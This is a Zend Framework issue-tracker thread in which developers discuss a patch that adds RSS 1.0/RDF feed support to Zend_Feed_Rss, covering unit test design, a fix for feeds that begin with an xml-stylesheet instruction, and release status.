Hi Matthew, I gave a look at the patch you submitted a few days ago.
The following line doesn't really makes sense to me.
{quote} $this->assertTrue($feed->count() > 0); {quote}
_importRssValid method is an utility method and we cannot assume in advance the file he's going to fetch is not a valid empty feed. I would create some valid RSS 1.0 unit tests instead.
The other part of the patch, the code fragment that should introduce RSS 1.0 compatibility it's fine, but I think it's incomplete. Zend_Feed doesn't handle only feed import but it's able to create and edit a feed as well.
Did you think about how an imported RSS 1.0 feed will be printed out? I assume it would be handled by Zend_Feed_Rss class but this library, as underlined by ZF-44, always returns an RSS 2.0 instance. It means, an RSS 1.0 come in and an RSS 2.0 come out... I suppose this is not a good workflow.
What do you propose to fix this consequential issue?
For the sake of completeness, I'd like to share an additional though. is, so far, the best feed parser written in python and probably one of the best feed parsers in the world. Zend_Feed should probably learn something from this library! :)
Posted by Simone Carletti (weppos) on 2008-06-02T05:05:34.000+0000
Any news on this feature? I would suggest to change status to unassigned if work is not in progress.
Posted by Benjamin Eberlei (beberlei) on 2008-11-08T00:53:58.000+0000
I am resolving then reoping this bug, since its occupied over a year now.
Please raise your voice Matthew if this a no go by me :-)
Posted by Benjamin Eberlei (beberlei) on 2008-11-08T00:54:14.000+0000
Reopened issue
Posted by Matthias Sch. (matthias-sch) on 2008-11-19T01:10:10.000+0000
any news on this bug? i think its just including the patch?
Posted by Matthew Turland (elazar) on 2008-11-19T09:21:20.000+0000
As far as I'm aware, no conflicting changes have been made to Zend_Feed_Rss since this patch was suggested, so the patch should work. Note that only the portion of the patch for library/Zend/Feed/Rss.php is really needed.
In terms of the portion that patches tests, it may be a better design decision to create an additional supporting method that first calls _importRssValid and then applies a non-empty check, and have all tests with non-empty test data files call that instead of _importRssValid, so that cases where data is expected to be empty can continue to function as normal.
Thoughts anyone?
Posted by Wil Sinclair (wil) on 2008-12-19T15:05:12.000+0000
Matthew, could you please evaluate the proposed solution and determine what we need to do to get this fixed? According to the votes, there seems to be a lot of interest in this issue.
Posted by Matthew Turland (elazar) on 2008-12-19T17:37:59.000+0000
I've considered Simone's point and have updated my patch accordingly. _importRssValid no longer checks the feed item count in this new patch. Instead, it modifies _importRssValid to return the $feed object it creates to be used by the calling method and modifies the two existing RSS 1.0 test methods to check their respective feed item counts.
I've applied my patch to Zend_Feed_Rss in a current SVN checkout to confirm that it still works. If I run the modified unit tests on the unpatched version of this class file, I get this output:
Posted by Benjamin Eberlei (beberlei) on 2009-01-08T04:38:51.000+0000
Resolved issue, i have verified and applied Matthews Testcases and Bugfixes. Thanks! Two very old bugs gone now :-)
Posted by old of Satoru Yoshida ([email protected]) on 2009-02-02T18:02:32.000+0000
Sorry, not in 1.7.4. I think it may be released in next minor.
Posted by twk (twk) on 2009-05-04T23:06:46.000+0000
The problem is reproducable with some feeds like…
The source of that feed begins with <?xml version="1.0" encoding="utf-8" ?> <?xml-stylesheet
Zend_Feed_Rss#__wakeup() checks if the feed is rdf or not with the following code but the firstChild of that feed is "xml-stylesheet" and so it is not treated as rdf. Please improve the check routine. if ($this->_element->firstChild->nodeName == 'rdf:RDF') { $this->_element = $this->_element->firstChild; } else { $this->_element = $this->_element->getElementsByTagName('channel')->item(0); }
Quick fix for the client user: Replace $feed = Zend_Feed::import($url); with something like $string = file_get_contents($url); $string = str_replace('<?xml-stylesheet href="/rss/user.xsl" type="text/xsl" media="screen" ?>', '', $string); // or whatever between <?xml ?> and <rdf:RDF $feed = Zend_Feed::importString($string);
Posted by twk (twk) on 2009-05-05T00:56:07.000+0000
To fix the problem, replace the following in Zend_Feed_Rss#__wakeup() // Find the base channel element and create an alias to it. if ($this->_element->firstChild->nodeName == 'rdf:RDF') { $this->_element = $this->_element->firstChild; } else { with // Find the base channel element and create an alias to it. $rdf = $this->_element->getElementsByTagNameNS('', 'RDF')->item(0); if ($rdf) { $this->_element = $rdf; } else {
Posted by Matthew Weier O'Phinney (matthew) on 2009-05-05T06:04:21.000+0000
Assigning to Alex.
Posted by Alexander Veremyev (alexander) on 2009-05-06T07:23:40.000+0000
Fixed.
Posted by Matt Steele (orphum) on 2009-05-20T19:10:15.000+0000
Was this added to 1.8.1? I don't see a Zend_Feed_Rdf class...
Posted by Nico Haase (osterlaus) on 2010-03-18T15:12:18.000+0000
I don't see this resolved :( A feed which was linked in ZF-6516 is not accessible, neither this one from a german computer-magazine:
Posted by Nico Haase (osterlaus) on 2010-03-21T04:51:37.000+0000
Sorry, please forget my last comment - I used an old version of ZF... shame on me... | http://framework.zend.com/issues/browse/ZF-405?focusedCommentId=22077&page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel | CC-MAIN-2015-27 | refinedweb | 1,641 | 77.23 |
rx-reduxrx-redux
A reimplementation of redux using RxJS.
Why?Why?
Reactive by default, this makes difference.
FeaturesFeatures
- All of the redux APIs implemented.
- Additionally,
storeprovides 2 rx objects you can utilize:
dispatcher$is a Subject that you can pass actions in.
state$is an Observable, a stream of states.
- And one helper function
import { connectAction } from 'rx-redux';
- You can use
connectAction(action$, store)to stream actions to dispatcher.
What does it look like?What does it look like?
const action$ = ;const newCreateStore = createStore;const reducer = ;const store = ;// stream states to viewstorestate$;// stream actions to dispatcheraction$;
Best practice to make your app all the way reactiveBest practice to make your app all the way reactive
Don't do async in
Middleware, create
RxMiddleware instead.
This will ease the pain to build universal app. See universal example
RxMiddlewareRxMiddleware
Which wrap action stream.
Look like this
;{return {iftypeof action === 'function'return RxObservable;// Don't know how to handle this thing, pass to next rx-middlewarereturn RxObservable;};}
How to design
RxMiddleware
- Get action, return Observable.
- Must return Observable.
- If you don't want to return a action (eg. if counter is not odd), return a
dummy action.
WIPWIP
- Figure out how to test a Rx project (No experience before).
- Work with Hot Module Replacement.
- Work with redux-devtools.
- More examples. | https://www.npmjs.com/package/rx-redux | CC-MAIN-2021-17 | refinedweb | 218 | 51.65 |
Functional Programming in Ruby
In Ruby, iteration is done mainly functionally with methods like each and map. We call this type of iteration functional because we are passing a function to be called on each item in the collection.In Ruby, iteration is done mainly functionally with methods like each and map. We call this type of iteration functional because we are passing a function to be called on each item in the collection.
[1,2,3].each { |item| puts item + 1 }
In this example. the function being passed is
{ |item| puts item + 1 }. In fact!
print_function = lambda { |item| puts item + 1 }
[1,2,3].each &print_function
Accomplishes the exact same behavior.
This is very much from the functional programing paradigm. Now, one thing that I can not stand to see in Ruby code is this.
def convert(old)
new = Array.new
old.each do |item|
new << transform(item)
end
new
end
The first hint that there is something wrong is the very odd call to return the
newvariable at the end of the
convertmethod. It seems odd and awkward, and that is a hint that you are working against the grain. Here is how it should look.
def convert(old)
old.map { |item| transform(item) }
end
Or alternatively:
def convert(old)
old.map &method(:transform)
end
Notice how clean and beautiful this is. We are working with the grain of functional programming here. Not only that, but there is less to debug, less to maintain and it takes less time to grok what is going on.
If you want to learn more about the functional programming roots of Ruby, I recommend learning OCaml, I am really enjoying it.
You should follow me on twitter here.
Technoblog reader special: click here to get $10 off web hosting by FatCow!
22 Comments:
Although, some of this only works with Symbol#to_proc of course!
11:57 PM, November 08, 2006
Thanks, Lucas - though I've read and coded this sort of thing before, having some of these things spelled out from different perspectives is nice for those of us learning Ruby.
I understand passing a proc to old.map, but I don't get how &method(:transform) works. I'm assuming 'transform' is a custom method defined in the class. Does that mean that &method will call the 'transform' method, automatically passing each element in 'old' to it and returning the value? Is there any advantage of using that over { |item| transform(item) } ?
11:58 AM, November 09, 2006
A real functional language is even better:
convert = map transform
(Haskell)
12:28 PM, November 10, 2006
A real functional language is even better:
convert = map transform
(Haskell)
Damn straight!
2:56 PM, November 10, 2006
As an aside, what OCaml book(s) do you recommend? I almost bought the Practical Ocaml book that just came out, but I'm seeing lots of bad reviews of that book.
Also, how about a PDX OCaml meetup?
3:19 PM, November 10, 2006
Thanks, Lucas, I found some neat stuff in libxml-ruby connected to this while implementing your more idiomatic way of expression in some code I had inherited.
Here is the blog post about it.
8:08 AM, November 12,:11 PM, November 30,:12 PM, November 30, 2006
i buy hydrocodone at buy hydrocodone - can't find any cheaper
7:02 AM, January 28, 2007
Why don't you use collect!?
8:58 AM, April 03, 2007
CarlH said...
Why don't you use collect!?
collect and map are synonyms, and can be used interchangably.
5:01 AM, July 03, 2007
i downloaded ruby, and i want to learn to program and everyone says its the easiest language to learn and ive read alot of tutorials on how to program for beginners but i still have literally no idea where to start... will someone please help me understand
4:36 PM, December 26, 2007
Hello!
My pick for the easiest language to learn would be definitely Python. I recommend you start with that. It is simple and clean, yet powerful. Ruby is really nice but Python is way more straightforward for a beginner, and is well documented.
3:00 AM, January 17, 2008
Instead of Practical OCaml, check out The Functional Approach to Programming by Cousineau and Mauny. Admittedly it uses Caml Light instead of OCaml, but the differences are very small (except that it doesn't cover OOP). It's gotten good revies and covers nicely the main points of FP.
There's also OCaml for Scientist by Harrop which I haven't read, plus a French O'Reilly book that's been translated into English.
12:37 PM, June 05, 2008:42
cleveland cavaliers jerseys
canada goose
rolex watches outlet
nike factory outlet
ralph lauren uk
basketball shoes
tory burch outlet
polo ralph kids
coach factory outlet
ralph lauren polo
michael kors outlet clearance
coach factory online
uggs on sale
christian louboutin pas cher
nike air max 90
ray ban sunglasses outlet
true religion sale
toms shoes
authentic louis vuitton handbags
coach factory outlet online
washington wizards jerseys
ugg boots
michael kors purses
jordan 11
ugg boots
uggs outlet
kate spade outlet
gucci handbags
cartier watches
chenyingying20160908
7:14 PM, September 07, 2016
adidas yeezy 350
ugg boots
adidas trainers
mbt shoes
cheap jordan shoes
gucci outlet
louis vuitton
washington wizards jerseys
ugg australia
coach factory outlet
chenlina20161018
7:49 PM, October 17, 2016
coach outlet online
michael kors outlet clearance
rolex watches for sale
moncler coats
cheap oakley sunglasses
coach outlet store online clearances
canada goose sale
chanel bags
louis vuitton outlet
tiffany and co jewelry
2017.1.4xukaimin
10:29 PM, January 03, 2017
michael kors bags
christian louboutin outlet
ralph lauren sale
ray ban sale
coach factory outlet online
yeezy boost 350
coach outlet online
moncler jackets
parada bags
cheap jerseys
xushengda0418
6:49 AM, April 18, 2017 | http://tech.rufy.com/2006/11/functional-programming-in-ruby.html | CC-MAIN-2017-22 | refinedweb | 981 | 61.56 |
We Frankenstein’ed our monolithic project’s legacy code with React and maybe you should too
My team is responsible for one of the oldest codebases still in active use in our company. I mean, it’s not like we’re gathering in a circle of old candles, chanting ancient songs and reciting the laments of past programmers from dusty tomes but as you might know, software projects that reach a certain age can grow a lot and get harder to maintain.
Dealing with the monolithic codebase of a project, which you know will continue to be used and build upon, can be tricky at times. There are important decisions and compromises to make. I will provide you with a few easy to follow steps that might help you regain control and make both management and customer happy.
To give you a rough idea of what we work with, my company is — among other projects — responsible for the development and maintenance of the Product Information/Content Management System (PIM/CMS) for a large German manufacturer in the automotive industry. Nearly all information about the vehicles that you can see on the manufacturer’s website, as well as data used by car dealers, car rental companies, used cars and even their online car configurator, can be created or modified via our PIM in line with market and language requirements.
When I took on my current position as senior frontend architect, I sat silently during our first code browsing sessions, spent hours navigating through the folder structures and when we did pair programming, I swallowed some of the remarks that came to mind when being completely outright would have made me look like an oh-so-wise (or pretentious) jerk.
Lesson 0 | Don’t judge!
If you are new to a project, take your time to understand the team, the history of the project and the environment that led to the current situation.
When the project was started roughly 10 years ago, most of the code was written in clean vanilla javascript against a Java/Spring Boot/Maven backend. For some additional functionality selected jQuery plugins had been employed. At some point, AngularJS had been introduced to the project and new pages and features were written with this framework. As time went by, more and more features and modules had been stacked on top and the PIM grew with each challenge, so that when google did the big rewrite from AngularJS to Angular 2, it had become too expensive at that time to migrate/upgrade the code to Angular 2.
Previously simple classes were extended again and again with each feature request and even though the team had relied on proven best practices of object-oriented programming in many places, the sheer amount of requested features and limited time budgets had led to some very peculiar solutions.
Projects of this size can’t be rewritten on a whim and the daily business often doesn’t leave you enough room to do regular cleaning and refactoring runs. I was fully aware that I was in for a rough ride when I took on this job. Before signing my contract, I spoke to my future project manager, the team and the leads of other teams in the company to make sure that both knowledge and motivation to change things for the better would be available.
Lesson 1 | Talk with people
Try to get a good idea of what people are willing to do, capable of and what constraints might affect the things you are planning to do.
After spending enough time with the code and team, I started making plans. We had enough knowledge of React and Redux in our ranks to take these libraries into consideration and neither of those would severely lock us in when searching for new hires. As the learning curves for both aren’t very steep, it would allow us to keep training budgets for fresh developers manageable.
If your company has preexisting knowledge of other libraries or frameworks such as Angular (current versions) or Vue, React is not the only viable choice but it was our choice.
After getting some time free from my daily tasks, I built two small prototypes of React/Redux modules and implemented them in our old code. The first was the base for a globally present info-center, an information hub the user can slide in from the sidebar to check error and notification messages. The other one was a mock that I placed in one of the many larger .jsp pages to check if both modules would work and could use the same Redux store without causing problems with the existing jQuery and AngularJS code.
Lesson 2 | Make a Prototype ASAP
Don’t just assume and plan, test early! If you think something should work, make a minimal use case prototype and see if your assumptions are correct before proceeding to make plans and calculate budgets.
With those prototypes, some facts about the libraries in question and a rough idea in mind how to proceed, I went to my project lead and explained the plan I had formulated in my mind. We would continue to maintain the old code to the best of our abilities while new features would be written in React where feasible and reasonable. With every larger feature request from the customer, we would communicate the need to make adjustments to the old code, explain why the requested changes would take longer to build than usual and start rewriting old AngularJS features in clean and reusable React code.
Lesson 3 | Come prepared and with a business plan
When you wish to make larger changes to a project, prepare yourself for the discussion with those making the final calls. Do your homework, know what you are talking about and first & foremost, try to find a solution that can be sold to the customer. This usually makes the management happy.
The term we used when we started this project was Strangular. I tried to find the old article again (citation needed) that I had found and which had coined this term for us. Our new and shiny React code would strangle the old AngularJS code and replace it piece by piece until nothing is left. When looking at our project today, I lovingly call it a Frankenstein’s Project. There are bits and pieces of old code and new code side by side and both are running well independently without causing any problems. All it took was one strike of lightning (our initial decision to make this step) and so far neither the team nor the customer came running with torches and pitchforks to my workplace.
[ cue evil laughter ]
These are the steps we took to make this work and keep it scaleable
Separation
Being build as a Java/Spring Boot/Maven project, our code is divided into multiple Java modules containing the backend code as well as a “web-module” with our old frontend code.
We wanted to keep the new code separated as good as possible for a number of reasons. We decided to use webpack as our bundler, have almost all of the new code covered with tests and run the code against a mock API on the webpack dev server without building and running the java code on our tomcat server.
With the help of a backend colleague, we created a new Maven frontend-module that is now tied into our project’s build process and takes care of installing node/npm, bundling our assets and handing them as a webjar to the old web-module. This way there were no additional changes needed to our deployment workflow.
Bridging two worlds
As our project is still mainly AngularJS code living in .jsp files and we needed to be able to initialise React components and modules in many different places in our old code, we had to build a bridge between both worlds.
Every “new world” feature/module we are building is registered with our reactBridge which is available in the scope of the “old world”.
// src/utils/reactBridge.js
import renderInfoCenter from '../components/modules/info-center'
import renderModuleA from '../components/modules/moduleA'
import renderModuleB from '../components/modules/moduleB'const reactBridge = {
renderInfoCenter,
renderModuleA,
renderModuleB,
}
export default reactBridge
In our old code, we included our reactBridge.js file and built an angular factory for our Services module to make the window.reactBridge available.
// services/reactBridge.js
angular.module('Services').factory('reactBridge', function () {
'use strict';
return window.reactBridge;
});
If we now needed to initialise or render a react module, we could simply place a hook in the code like
<div id=”infocenter” /> and call the render function where needed.
// angular-base-layout.jsp
<script src="${BASE}/webjars/frontend/vendor.js"></script>
<script src="${BASE}/webjars/frontend/base.js"></script>[...]<script>
window.reactBridge.renderInfoCenter()
</script>
For making Redux dispatches available to old code, this was a bit more complicated but still manageable. We import our store and all dispatchable actions that need to be exposed to the old code for shared functionality and add them to the reduxBridge.
import store from '../redux/store'
import { addNotifications } from '../redux/actions/notifications.actions'
import { dispatchActionForModuleA } from '../redux/actions/moduleA.actions'
const bridgeDispatch = (func, payload) => store.dispatch(func(payload))
const reduxBridge = {
addNotifications: payload => bridgeDispatch(
addNotifications,
payload
),
dispatchActionForModuleA: () => bridgeDispatch(
dispatchActionForModuleA,
payload
),
onStateChanged: (callback) => {
store.subscribe(() => {
const state = store.getState()
callback(state)
})
},
}
export default reduxBridge
Again the angular module
// services/reduxBridge.js
angular.module('Services').factory('reduxBridge', function () {
'use strict';
return window.reduxBridge;
});
If we were to dispatch an addNotifications action for the info-center, for example, we could easily do this in the successAction of our API call.
// somewhere in our code...
showInfo : function(message) {
var data = getMessageData(message, 'info');
typeof reduxBridge === 'object'
? reduxBridge.addNotifications([data])
: console.log("reduxBridge not available after timeout")
},
Decide for each Feature Request individually
If I had all the time in the world, I would completely rewrite the old project, bit by bit for every request that the customer makes. In an ideal world, that might be possible. In reality, though, you have to make some tough calls and keep your customer in mind, not only your developers. Finding a healthy balance is key here.
There will be cases when either the deadline demands quick actions or the remaining budget for the quarter is nearly depleted. In those cases, it might be the better choice to keep your internal idealist in check and do what’s best in the short run.
Lesson 4 | Choose your battles wisely!
Find a balance between refactoring, rewrites and adjustments in regards to budget and time and depending on the requirements. In the long run, new and well written code will benefit both customer and the team managing the code but in some cases you just have to get shit done quick. Make wise decisions for the better of the project.
What did we gain?
With all the changes we made and our new React/Redux frontend-module, we’ve made a lot of improvements both for us and the customer. Here’s a short and not exhaustive list:
- Webpack Bundling with tree shaking
- Webpack Dev Server for better FE code development
- modular and reusable react components
- more velocity with every completed feature
- new code is easier to test and reason about
- mock data / API for development independently from BE team
- Redux store as a single point of truth instead of old AngularJS scope
- Redux middleware as an abstraction layer between frontend code and API
- no need for a complete relaunch
- reduction of technical debt
- we can pick an attack the most relevant parts of the code when and where we want
- even more motivated team members than before
What did we lose?
We spent some time on our internal budget to develop a prototype before addressing the customer and starting to solve feature requests with the new setup.
In some cases, we still mainly maintain and extend the old code even though rewriting it would be so much more fun.
This journey was not without its perils. Making huge changes like this to the way you work in a company is likely to create some friction. You need to clearly communicate your estimates when planning new features. You need to include the customer in this decision process if it means that things will take a bit longer while getting started. You need to create a shared understanding with both your management and the customer why building up technical debt will cost a lot more money in the long run.
In the end, I can wholeheartedly say that I never — not even in the slightest — regretted our decision. Happy developers work faster. Clean code is easier to maintain. Clean code makes for happy developers.
Some words about me:
If you want to read more of my articles, feel free to check out my author page:
- Building games with React Native [Series]
- Spread & Rest Syntax in Javascript
- clean and simple Redux, explained
- Game Theory behind Incremental Games [Series]
- Custom and flexible UI Frames in React Native
- React Native Web App with Hooks, Bells, and Whistles [Series] | https://allbitsequal.medium.com/we-frankensteined-our-monolithic-project-s-legacy-code-with-react-and-maybe-you-should-too-8cd807bac597 | CC-MAIN-2022-27 | refinedweb | 2,189 | 57.81 |
MySQL is a popular free database which many (including me) prefer for writing database applications. Being relatively new to WPF, I wanted to see how MySQL could be used in a WPF application. This proved to be a fairly long journey, so we’ll probably need several posts to get through it all.
First, if you’re new to MySQL, you’ll need to download and install it. I won’t go into great detail here, apart from pointing you in the direction of the main download page for the free version (there are commercial versions that cost real money as well). After installing MySQL itself, you’ll need to install the MySQL ADO.NET connector in order to use it in WPF programming. This is currently located here, but if in the future this link is dead, just do a search for MySQL and ADO.NET.
With these two packages installed you should be ready to start writing code in Visual Studio (VS). The program I’ll discuss is a front end to an existing database, which allows you to insert, modify and delete records in the database. In homage to Sheldon Cooper, the database will contain details of my comic book collection. I’ll assume that you understand the basics of database construction, including the creation of tables and insertion of records into these tables. I’ll also assume you know the rudiments of SQL, since I’ll be using it to construct a few commands to be sent to the database. If you don’t know SQL very well (or at all) it shouldn’t hamper you too much since you can probably figure out what the commands are doing (SQL is fairly transparent at this level).
First, we’ll need to consider the structure of the database itself. It contains three tables, which contain the following fields:
Publishers (publishers of comic books)
- Key_Publishers (the primary key)
- Name (the name of the publisher)
Titles (titles of comic book series, not of individual issues)
- Key_Titles (the primary key)
- Title (the title’s name, such as Action Comics)
- Publisher (an int giving the key of the publisher of this title)
Issues (individual issues of given titles)
- Key_Issues (the primary key)
- IssueTitle (the title of the individual issue)
- Title (an int linking to the key in the Titles table)
- Volume
- Number
- IssueDay
- IssueMonth
- IssueYear
- ComicVine (the URL of the page on giving details about this issue)
The UI of the program consists of a tab control with three tabs: one for editing the issues, one for the titles and one for the publishers. We’ll consider the issues one first. It looks like this:
At the top is a ComboBox from which we can choose the title. Beneath this is a DataGrid in which we display the individual records from the data base for that title. At the bottom are a few boxes in which individual data for the selected issue are displayed. The user can edit the information either directly in the DataGrid, or by editing the boxes at the bottom. The info in the boxes is identical to that displayed in the DataGrid except for the ComicVine link, which is shown as a URL in the text box, but as a hyperlink with the label ‘ComicVine’ in the DataGrid. This is done because the URL is usually far too long to be displayed conveniently in the grid, as you can see. The ‘Add’ button allows the user to add a new issue.
Clearly there’s a lot going on here, so we’ll need to take things step by step. To begin, let’s see how we can get the ComboBox to display the list of titles. (I’ll assume you can create the basic UI using Expression Blend (EB) or VS so I won’t go into that here.)
First, we need to let our VS project know we’ll be using MySQL. If you’ve installed the connecter mentioned above, you still need to include MySQL as a reference in your VS project. To do this, right-click on References in Solution Explorer and then click on the .NET tab. You may need to wait a few seconds while this list finishes loading, but eventually you can find MySQL.Data in the list, so you should add that. Now we can start writing some code.
Most of the linkage between controls and the MySQL database is done via data binding, which we’ve already looked at for simpler cases (see the index for a list of pages). Before we dive into the code it’s essential that you understand the structure of the program.
Ultimately the data are stored in the MySQL database, but the program itself doesn’t use this for the displays. First, the data must be loaded from the MySQL database into an internal data structure, which is then used for the main working of the program. Changes made by the user to the data using the UI affect only this internal representation of the data. If we want these changes to be made permanent, we need to write the code that will save these changes back to the original MySQL database.
WPF provides several internal data structures useful for storing information from a database. In fact, VS provides an automated way of creating a DataSet from database servers it has access to. Although you can create a DataSet from a MySQL server, the associated functionality provided by VS doesn’t seem to work with MySQL (at least I couldn’t find any way of making it work – there may be something that I haven’t discovered), so we need to write our own code to handle changes to the MySQL database. This isn’t that hard to do as we’ll see, but we’re getting ahead of ourselves.
Let’s see how we can access the data required to populate the ComboBox containing the list of Titles. From the above structure of the database, we see that the information is stored in the Titles table, so we need to load that data into the program. We’ve provided a separate class that handles this, and here’s the relevant code:
using System; using System.Collections.Generic; using System.Data; using System.Linq; using System.Text; using MySql.Data.MySqlClient; //..... class DatabaseTable { MySqlConnection connection; MySqlDataAdapter adapter; public DataTable GetTable(String query, String sortBy) { String connString = "server=localhost;uid=root;pwd=xxxx;database=comics;"; connection = new MySqlConnection(connString); adapter = new MySqlDataAdapter(query, connection); DataTable dataTable = new DataTable(); adapter.Fill(dataTable); dataTable.DefaultView.Sort = sortBy; return dataTable; } }
Note the ‘using’ statement that specifies the MySql library.
To get at data in a MySQL database we first need to connect to it, and that’s what the MySqlConnection is for. Its constructor requires a string giving the information needed to connect. In this case, we specify the server as ‘localhost’ which means it’s on the local machine. If you’re connecting to a remote server, you’d give the URL instead. The userID (uid) and password (pwd) are then given, followed by the name of the database.
Next, we need to create a MySqlDataAdapter, which is what does the actual work of retrieving the information from the database and storing it in the local object. In order for the adapter to get some data, it needs to know what to look for, and that’s what the ‘query’ string is for. This is an SQL command, which we’ll get to in a minute.
The adapter has to be given an object in which to store the data it retrieves. The standard data structure is the DataTable (in System.Data), which is essentially a single table of data. The Fill() method of MySqlDataAdapter executes the query on the MySQL database and loads the result in the DataTable. The DataTable will have columns with the same names as those in the original database, and it is these column names that can be used in data binding later on.
The last thing we do is define a sorting condition. Remember that whenever we bind a control to a data source such as a list, a collection view is automatically created and inserted between the data source and the control. This also applies to data binding between a control such as a ComboBox and a DataTable. The ComboBox displays the data as given by the collection view, so if we wish to sort the data as displayed in the UI, we add a sort command to the view. The data in the original DataTable is unchanged; all that changes is the way that data appears on screen.
In the case of a DataTable, we access its DefaultView as shown in the code, and then attach a Sort command to the view. The Sort is simply a string giving the sorting command we want. If we wish to sort the list of Titles, for example, we would specify ‘sortBy’ as “Title”, which is the name of the column we want to use as the sort key. (More complex sorting can be done too. We’ll see this when we consider the DataGrid showing the issues.)
There’s an important point here. Those of you familiar with SQL will know that we can include a sorting command as part of an SQL query, so you might be wondering why we didn’t just include the sorting command as part of the ‘query’ we sent to the database. The reason is that doing it this way would ask the MySQL database to do the sorting, so that the data used to populate the DataTable would be correctly sorted when it first arrives. However, if we then add extra rows to the DataTable by using our program, these rows would merely be tacked onto the end of the DataTable and would not be correctly sorted, since the DataTable hasn’t been told to sort its data. By putting the sort command into the DataTable rather that in the original SQL command, we ensure that the data as displayed in the program are always correctly sorted.
OK, we now have our internal DataTable, so how do we use this to populate the ComboBox? Fortunately, we’ve already considered data binding with a ComboBox, so we can model our code along that example. We’ll do things a little differently here, however, to illustrate a common technique for providing data sources in data binding.
We saw above that we provided the code for getting the DataTable in a class called DatabaseTable. We can access the DataTable by declaring an ObjectDataProvider in the XAML part of the code. In the Window.Resources section of the XAML, we can write:
<Window xmlns="" xmlns: <Window.Resources> <ObjectDataProvider x: <ObjectDataProvider.MethodParameters> <s:String>SELECT * FROM titles</s:String> <s:String>Title</s:String> </ObjectDataProvider.MethodParameters> </ObjectDataProvider> </Window.Resources> <!-- Code for UI --> </Window>
This creates a resource with the name given as the Key (TitlesTable) by creating an object of the given type (DatabaseTable) and calling the indicated method (GetTable). The parameters passed to the method are given next, and in this case are two strings. The first string is the query to be sent to the MySQL database, and the second string is the Sort command, so that the DataTable sorts the records by Title.
Note that you’ll need to ensure that the various prefixes used in this XAML code are defined. Typically most of them are defined for you when you create a project in VS, but there are a couple that you’ll probably need to define yourself. Here, the ‘local’ namespace is the namespace used for the code in the project (Comics here). The ‘s’ namespace is required to define the String data type. (This is one reason why I hate XAML: although it is more compact in some cases, there is so much finicky stuff that it can be hard to get it right.)
We’re almost there. The last thing we’ll look at in this post is how to define the ComboBox so it gets its data from the ObjectDataProvider we just defined. The relevant line is:
<ComboBox x:
There’s a bit of stuff in here that we’ll get to later, but the relevant bits are:
- ItemsSource is bound to the StaticResource TitlesTable that we just defined. This means that the items displayed in the ComboBox are bound to the items in that DataTable.
- DisplayMemberPath is specified as ‘Title’. Since the DataTable contains more than one (two, actually) columns, we need to tell the ComboBox which column to display. The ‘Title’ is the textual title which the user can read.
- SelectedValuePath: internally, we use the Key_Titles column for connecting a title with an issue (as we saw in the database tables above), so when the user selects an item from the ComboBox, we need to know the Key_Titles value in order to be able to retrieve the issues for that Title. More on this later when see how to populate the DataGrid.
- SelectionChanged: when the user selects an item in the ComboBox, we need to update the display in the DataGrid to display all issues with that Title, so we provide an event handler to do this. Again, we’ll see how this works in a later post.
The program at this stage should display the list of titles in the ComboBox, although selecting an item won’t do anything yet. But that’s enough for one post, so we’ll continue the story in the next post. | https://programming-pages.com/tag/combobox/ | CC-MAIN-2018-26 | refinedweb | 2,270 | 68.5 |
There have now been a number of different PCB revisions which have made small changes to the design of the Raspberry Pi PCB. In the latest revision some of these changes may affect the operation of Python code developed for earlier versions. In order to make you script react to these changes you may need to identify the board revision so your script can take appropriate action.
The following Python function “getrevision()” can be used to return a string containing the hardware revision number. This is a four character string such as “0002”.
Here is the Python function :
def getrevision(): # Extract board revision from cpuinfo file myrevision = "0000" try: f = open('/proc/cpuinfo','r') for line in f: if line[0:8]=='Revision': length=len(line) myrevision = line[11:length-1] f.close() except: myrevision = "0000" return myrevision
If you include this definition at the beginning of your Python script you can use it to set a variable equal to the board revision number :
myrevision = getrevision()
If this variable is equal to “0000” then there was an error while running the function.
Raspberry Pis that have been overvolted will have a code prefixed with “100”. If I overvolted my device I would end up with a hardware revision code of “1000002”.
At the time of writing your board revision number could be “0002”, “0003”, “0004”, “0005” or “0006”. You can use the Checking Your Raspberry Pi Board Version post to double check the results of this Python function.
Just a nitpick, but
length=len(line)
myrevision = line[11:length-1]
could be replaced by the shorter and simpler:
myrevision = line[11:-1]
Or, the whole function could be replaced by the even shorter but not simpler:
def getrevision():
return ([l[11:-1] for l in open('/proc/cpuinfo','r').readlines() if l[:8]=="Revision"]+['0000'])[0]
JOOSTETO , you trying to save on code lines ?
it better to be human readable | https://www.raspberrypi-spy.co.uk/2012/09/getting-your-raspberry-pi-revision-number-using-python/ | CC-MAIN-2022-27 | refinedweb | 320 | 58.82 |
Details
Description
It would be nice to set a default access to a table so adding a new user does not require adding all the permissions for each table they will read.
Issue Links
- duplicates
ACCUMULO-1479 Create per-user permissions for a given table namespace
- Resolved
- relates to
ACCUMULO-802 table namespaces
- Resolved
Activity
- All
- Work Log
- History
- Activity
- Transitions
I would like to promote this ticket and perhaps slightly modify it. I have a user that has permissions to create tables. However when that user creates a new table, I would like the user to be able to read, write, alter, bulk_import, and grant for that new table. I do not want to give the user global permissions as such, only for new tables the user creates. Otherwise I have to manually give the user those permissions for the new table everytime a new table is created.
That should be the default behavior? Is this not the case and/or did it change in 1.5?
It does not appear to be the case in 1.4.3+. I have a user creating a table and subsequently getting errors somewhere down in a doesTableExist method which disappear once I specifically grant permissions on the new table. I will try to include more specifics when I get back to work later this month.
I just tested this on 1.4.2 release, 1.4.3 SNAPSHOT, and 1.5.0 SNAPSHOT, and I'm not seeing any changes in this behavior. A user was created, given create table, switched to that user, and then created a table and they had all TABLE permissions for the newly created table.
Furthermore, this ticket was about adding a new feature to Accumulo regarding Table permissions, which wouldn't have had any diminishing effect in this behavior. All it would have done would have allowed a marking on tables such that newly created users would automatically have a set of TABLE permissions for it.
If a user has CREATE_TABLE, they are granted Table.READ, Table.WRITE, Table.BULK_IMPORT, Table.ALTER_TABLE, Table.GRANT, Table.DROP_TABLE to the tables they create.
This ticket wasn't a bug, it was a feature request to add a table level access. So you could create a table and give it a global read/write/modify/etc. so any users created after the table could be given automatic access to it.
Will
ACCUMULO-1479 satisfy this ticket? Can I close this as a duplicate?
To clarify, for my own purposes- we want to have a set of table permissions that all users get, regardless of their own access. That is, a users access for each permission is going to be the union of their own permissions and the table default permission. | https://issues.apache.org/jira/browse/ACCUMULO-617 | CC-MAIN-2017-43 | refinedweb | 462 | 63.59 |
lein new app clojure-noob
Building, Running, and the REPL
